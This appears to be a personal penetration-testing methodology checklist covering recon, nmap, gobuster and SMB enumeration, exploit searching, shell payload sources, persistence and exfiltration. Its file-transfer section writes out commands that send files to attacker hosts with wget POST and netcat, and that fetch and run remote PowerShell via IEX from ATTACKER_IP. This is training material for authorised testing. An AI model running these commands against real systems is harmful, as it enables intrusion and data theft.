Most assessments involve the following things:
- enumeration
- identifying running services & the purpose of the target
- re-enumerating services
- finding software and hardware versions
- searching for exploits in found versions
- collecting credentials
- exploitation
- enumeration (again)
- persistence
- privilege escalation
- enumeration (again)
- persistence (again)
Enumeration is recursive. You may do initial enumeration, then re-enumerate what you've found, and this may happen several times before you do any exploitation.
Once you gain a foothold on a target somehow (i.e. remote code execution or remote access) you will have to re-enumerate. You will want to enumerate other users on the target or network, any new services that are only available locally, and any security flaws on the target now you have access to the file system and system information.
You may then wish to do any/all of the following:
- escalate to a user of higher privilege
- pivot to another network or host (lateral movement)
- exfiltrate data (passwords, audit logs, user information, database dumps)
- establish persistence on the host (remote access tools, rootkits, webshell backdoors)
This flowchart provides a high-level overview of the steps involved:
![[Pasted image 20210628184558.png]]
- Reconnaisance
- Network Discovery
- Run DNS Enumeration on known domain names
- Scan for live hosts within an IP range
- Check Shodan against target IP addresses
- Google any exploits identified by Shodan
- Nmap
- Run standard scripts scan against top ports
- All ports scan
- UDP scan
- OS Enumeration
- Check operating system version for CVEs
- Vulnerability scan on specific ports
- Network Discovery
- Test services found in Reconnaisance Stage
- Interact with the service manually
- Check Hacktricks for advice on penetration testing the service
- Enumerate version numbers
- In banners when connecting to the service
- Using
nmap's suite of scripts - Infer from other hosts on network/operating system version/age of the target machine
- Search version numbers in searchsploit (run
searchsploit -ufirst) - Attempt to login to or register for the service
- With known credentials
- With default credentials
- Fuzz the service with potential dangerous/unexpected input
- If available, analyse code for the service
- Identify an Exploit
- Check the exploit has no prerequisites (certain version numbers, authenticated access) that you have not met
- Test locally if possible
- What does the exploit do?
- Leak information?
- Use this information to further enumerate services
- Use this information to log in to a service
- Allow code execution?
- Can you get a shell?
- Leak information?
- Gaining A Shell
- If you have code execution, try to get a shell on the system
- Try multiple shell payloads
- PayloadsAllTheThings
- pentestmonkey
- HighOn.Coffee
- Try generating one with
msfvenom
- Try multiple languages
- If the site runs on ASP, also try ASPX or JSP
- Try well-known ports
- Try multiple shell payloads
- If you have code execution, try to get a shell on the system
- Post Exploitation
- Re-enumeration
- Privilege Escalation
- Data Exfiltration
- Persistence
Enumeration is a wide topic, so this section contains a lot of detail on different stages and services.
Use this enumeration to do initial scans of the network - the hosts & services discovered can then be subsequently enumerated.
If you have both a domain and a public IP address, scan both - they may have different results, especially if the domain is protected by something like cloudflare.
Scan internal IP addresses with [[nmap]] if you have access to the internal network.
Find an IP for a domain name using host:
$ host example.comUse these commands to discover hosts on a subnet.
Scan multiple targets on your subnet (assuming you are aware of a host with the IP address a.b.c.d):
$ nmap -sP -PI a.b.c.0/24See this Stack Exchange article for more.
Query ARP (Address Resolution Protocol) tables:
$ arp -a -nView your neighbours:
$ ip neighThis is similar to the arp -a -n command, but is a nice alternative. See this RedHat article for more.
Use nmap to identify open ports on a specific host.
With the -v flag to see as it's discovered:
$ mkdir nmap
$ nmap -sC -sV -v -oA nmap/target [IP/HOST]Using -Pn if pings are blocked:
$ nmap -sC -sV -Pn -v -oA nmap/target [IP/HOST]Do all 65535 ports:
$ nmap -p- -oA nmap/target-allports [IP/HOST]Add a sleep 300; to the start of this command to make it wait till your first nmap is done so you aren't running two scans at once. It's also worth waiting to see if your first scan requires the -Pn flag before running it.
With high speed:
$ nmap -p- --min-rate=10000 -oA nmap/target-allports [IP/HOST]Autorecon verbose version:
$ nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oA nmap/verbose-allports [IP/HOST]If you find new ports, rescan them:
$ nmap -p- --min-rate=10000 -oA nmap/[TARGET]-allports [TARGET]
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-22 08:20 BST
Nmap scan report for [TARGET]
Host is up (0.036s latency).
Not shown: 62461 filtered ports, 3069 closed ports
PORT STATE SERVICE
...[old ports skipped out, new ports below]..
22022/tcp open unknown
40893/tcp open unknown
52221/tcp open unknown
$ nmap -sC -sV -p 22022,40893,52221 -oA nmap/[TARGET]-newports [TARGET]Search the version numbers returned against searchsploit if you get anything back.
Takes guesses at the operating system (requires root privileges):
$ sudo nmap -O -oA nmap/target-os [IP/HOST]If SMB is running, you can use the smb-os-discovery script:
$ nmap --script smb-os-discovery [IP/HOST]Scans common UDP Ports (requires root privileges):
$ sudo nmap -sU -oA nmap/target-udp [IP/HOST]Will identify common vulnerabilities such as Eternal Blue and Heartbleed:
$ nmap --script vuln -oA nmap/target-vuln [IP/HOST]Basic DNS lookup:
$ dig [IP/HOST]Zone transfer (may expose more domains):
$ dig axfr [IP/HOST]Supply the target itself as a DNS server if it's running DNS:
$ dig axfr [IP/HOST] @[IP/HOST]If you find a service running on the target, and you haven't seen it before, search "Pentesting [service]" in Google - you will often find a hacktricks page.
Before running Gobuster, check [[Methodology Checklist#What Powers the Site|what powers the site]].
$ mkdir gobuster
$ gobuster dir -u http://[IP/DOMAIN] -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -o gobuster/rootMake sure to use the extension you've found with -x [extension] when enumerating the site technologies.
Alternative list if running out of ideas:
$ gobuster dir -u http://[IP/DOMAIN] -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o gobuster/rootWith -k flag if need to ignore a bad cert:
$ gobuster dir -k -u https://[IP/DOMAIN] -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o gobuster/rootThis will find directories such as /cgi-bin/ when looking for shellshock:
$ gobuster dir -f -u https://[IP/DOMAIN] -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o gobuster/rootThen you can run a second scan recursively on the directories you've found.
When enumerating the site:
- check both HTTP and HTTPS versions
- check both IPs and domains
- Launch Burp
- Add a proxy in browser to
localhost:8080 - View the traffic as it comes through
- Add rules to not intercept traffic to irrelevant domains (optional)
Press Ctrl + U (on Firefox) to view the source, or right-click and view source.
Look for:
- comments (
<!-- -->) - references to files (scripts, images, directories) and their file extensions
- hidden elements (
display: noneetc) - form elements
Navigate to /robots.txt to check for any disallowed pages.
Try to visit the following:
index.htmlindex.phpindex.aspindex.aspxindex.jsp
Stop as soon as one of them loads.
Use curl to read the X-Powered-By header:
$ curl -v [TARGET]Wappalyser is a browser extension that can be used to enumerate the tech stack running on the site. Install it from here (Firefox) or here (Chrome).
Source is available here.
Pass all discovered technologies and version numbers to searchsploit - e.g.
$ searchsploit -u #update
$ searchsploit term1 [term2] ... [termN]Use flags such as -e for an exact match, --exclude="term" to not match certain terms.
- Where can you supply user input?
- Can you register for an account?
- Can you change any hidden fields to manipulate registration?
- Can you upload files?
- Are there any restrictions on the file type? Are they server-side or client-side? See [[File Upload]]
- Are there any experiemental features, or things that are not fully implemented/under maintenance?
- They may have weaker security
- Look for beta, maintenance, development directories and subdomains
Has anything important or sensitive been removed?
- check google cache
- check archive.is
- check archive.org
- check wayback machine
Get a feel for the site or site owners' public profile:
- search the name of the company or site owner
- do they have a github? could it have site source in it?
- find usernames on the site - run them through nixintel.info
- Run
exiftoolson images
Basic scan - may expose hostnames:
$ smbmap -H [HOST] -P [PORT]Enumerate with null authentication:
$ smbmap -u null -p "" -H 10.10.10.40Or with a specific user:
$ smbmap -u username -H 10.10.10.40Connect to a server:
$ smbclient //[IP]Connect to a specific share:
$ smbclient //[IP]/[SHARE]Connect with null authentication:
$ smbclient -N //[IP]/[SHARE]Use the -L flag to list shares:
$ smbclient -L hostname -U usernameOnce connected, use the following commands to enumerate files:
dirto list files and directoriescdto change directorygetto download a file
See more at:
- https://www.pentestpartners.com/security-blog/data-exfiltration-techniques/
- https://book.hacktricks.xyz/exfiltration
- https://hackersinterview.com/oscp/oscp-cheatsheet-windows-file-transfer-techniques/
- https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/
Host must be running SSH, and you must be authenticated.
On local box:
$ scp [user@][TARGET]:/path/to/target/file /local/pathSee more at [[Fundamental Skills#Secure Copy]]
Use a wget POST request if you have a fileserver that accepts posts. I have one here:
$ wget --post-file /path/to/file http://[LOCAL_IP]:[PORT]/On host:
$ nc -l -p [PORT] > /path/to/outfileOn target:
$ nc -w 3 [HOST_IP] [PORT] < /path/to/fileSee more at [[netcat]]
Locally:
$ sudo impacket-smbserver share .On target machine:
$ copy /path/to/file \\ATTACKER_IP\share\- HTTP (running a
python3 -m http.serverto serve files)wget-wget http://[ATTACKER_IP]/file -O /path/to/filecurl-curl http://[ATTACKER_IP]/file -o /path/to/file
- SCP - on attacker machine, run
scp /path/to/target/file [user@][TARGET]:/target/path - FTP - upload to an FTP share and find where the files are stored (make sure you're in
binarymode when uploading.exefiles) - Powershell
Invoke-WebRequest(similar towget) -powershell.exe -command "Invoke-WebRequest http://[ATTACKER_IP]:[PORT]/file -o file - Powershell
IEX(executes.ps1after downloading it) -IEX (New-Object Net.WebClient).DownloadString('http://[ATTACKER_IP]/file.ps1')" - SMB Server
- Run
sudo impacket-smbserver share .locally - Run
copy \\[ATTACKER_IP\share\file
- Run
- SMB Share - Upload to an SMB share and find where the files are stored
Windows writeable directories - write here if you can't write anywhere else:
%temp%\windows\system32\spool\drivers\color\